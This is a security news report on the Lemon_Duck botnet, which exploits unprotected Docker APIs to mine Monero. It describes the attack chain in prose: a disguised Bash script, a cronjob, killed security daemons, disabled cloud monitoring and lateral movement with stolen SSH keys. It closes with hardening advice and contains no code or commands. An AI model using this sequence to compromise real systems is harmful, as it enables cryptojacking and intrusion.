The owners of the Lemon_Duck botnet are targeting Docker APIs on Linux systems as part of a large-scale Monero crypto-mining effort. Cryptomining groups are a persistent danger to Docker systems that aren’t properly protected or configured, with several mass-exploitation efforts recorded in recent years.
Lemon_Duck had previously targeted weak Microsoft Exchange servers and Linux computers via SSH brute force operations, Windows systems susceptible to SMBGhost, and servers hosting Redis and Hadoop instances. The threat actor behind the continuing Lemon_Duck campaign is disguising their funds through proxy pools, according to a Crowdstrike assessment released today.
Lemon_Duck exploits unprotected Docker APIs by launching a malicious container that downloads a Bash script disguised as a PNG image. The payload sets up a cronjob in the container to download a Bash script (a.asp) that does the following:
- Kill processes based on recognized mining pools’ names, competitor cryptomining groups’ names, and so forth.
- Kill crond, sshd, syslog, and other similar daemons.
- Delete any file paths that have been identified as an indicator of compromise (IOC).
- Kill network connections to C2s suspected of belonging to rival cryptomining operations.
- Disable monitoring service of Alibaba Cloud, which guards instances against malicious activity.
In November 2021, cryptomining malware used by unknown individuals was found to disable protective mechanisms in Alibaba Cloud services. After doing the above tasks, the Bash script then downloads and executes the cryptomining program XMRig and a configuration file that hides the actor’s wallets behind proxy pools.
Lemon_Duck tries lateral movement by using SSH keys obtained on the filesystem once the infected computer has been set up to mine. If those are available, the attacker will employ them to carry out a second infection. Parallel to this effort, Cisco Talos reports on another ascribed to TeamTNT, which similarly targets Amazon Web Services exposed Docker API instances.
To avoid discovery, the attack organization aims to deactivate cloud security services and mine Monero, Bitcoin, and Ether for as long as possible. It is evident that securely configuring Docker API installations is critical, and administrators should begin by comparing their setup to the platform’s best practices and security guidelines. Set resource consumption limits for all containers, apply tight image authentication requirements, and follow the least privilege concept.